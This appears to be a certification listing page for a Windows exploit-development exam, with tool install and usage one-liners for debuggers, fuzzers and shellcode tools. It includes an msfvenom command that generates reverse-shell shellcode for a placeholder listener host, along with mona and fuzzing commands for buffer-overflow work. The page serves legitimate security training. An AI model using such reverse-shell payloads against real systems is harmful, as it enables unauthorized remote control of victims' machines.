Offensive Security Exploit Developer

Expert 48hr exam + report Pass: 100+ points $1,499

Windows exploit development, custom shellcode, DEP/ASLR bypass.

Official Page

IssuerOffSec

Format48hr exam + report

Duration72 hours total

Pass Score100+ points

Valid For3y

Overview Syllabus (6) Tools (5) Cheat Sheets (1) Labs (1)

Recommended Tools

PE-bear Essential

Analysis

PE file editor and analyzer

installDownload from github.com/hasherezade/pe-bear

usageOpen PE binary, examine sections and imports

Immunity Debugger Essential

Debuggers

Windows debugger with Python scripting

installDownload from immunityinc.com

usageAttach to process; use mona.py commands

WinDbg Essential

Debuggers

Microsoft kernel and usermode debugger

installInstall via Windows SDK

usagewindbg -g target.exe

x64dbg / x32dbg Essential

Debuggers

Modern open-source Windows debugger

installDownload from x64dbg.com

usageLoad .exe or attach to process

mona.py Essential

Exploit Dev

Python plugin for Immunity automating exploit tasks

installCopy to Immunity PyCommands folder

usage!mona findmsp; !mona jmp -r esp; !mona bytearray

pwntools Essential

Exploit Dev

Python CTF and exploit framework

installpip3 install pwntools

usagefrom pwn import *; cyclic(200)

boofuzz Essential

Fuzzing

Python network protocol fuzzer

installpip3 install boofuzz

usages_initialize(); s_string("USER"); s_string("A"*1000, fuzz=True)

msfvenom Essential

Shellcode

Metasploit payload and shellcode generator

installsudo apt install metasploit-framework

usagemsfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=4444 -f python -b "\x00"

NASM Essential

Shellcode

Netwide assembler for custom shellcode

installsudo apt install nasm

usagenasm -f win32 payload.asm -o payload.obj